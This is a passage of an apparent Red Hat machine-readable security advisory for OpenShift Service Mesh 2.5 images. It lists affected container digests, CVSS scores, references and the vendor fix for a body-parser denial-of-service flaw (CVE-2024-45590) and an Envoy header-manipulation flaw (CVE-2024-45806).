"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, { acknowledgments: [ { names: [ "Mike Whale", ], }, { names: [ "James Force", ], organization: "Red Hat", summary: "This issue was discovered by Red Hat.", }, ], cve: "CVE-2024-45806", cwe: { id: "CWE-639", name: "Authorization Bypass Through User-Controlled Key", }, discovery_date: "2024-09-20T00:40:20.976812+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2313683", }, ], notes: [ { category: "description", text: "A vulnerability was found in Envoy that allows external clients to manipulate Envoy headers, potentially leading to unauthorized access or other malicious actions within the mesh. This issue arises due to Envoy's default configuration of internal trust boundaries, which considers all RFC1918 private address ranges as internal. The default behavior for handling internal addresses in Envoy has been changed. Previously, RFC1918 IP addresses were automatically considered internal, even if the internal_address_config was empty. The default configuration of Envoy will continue to trust internal addresses while in this release and it will not trust them by default in next release. If you have tooling such as probes on your private network which need to be treated as trusted such as changing arbitrary x-envoy headers, please explicitly include those addresses or CIDR ranges into `internal_address_config`. Successful exploitation could allow attackers to bypass security controls, access sensitive data, or disrupt services within the mesh, like Istio.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Potential to manipulate `x-envoy` headers from external sources", title: "Vulnerability summary", }, { category: "other", text: "Red Hat's CVSS score and impact are specific to our product and may not match those of upstream. This is due to how envoy is configured and used within our OpenShift Service Mesh product.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", 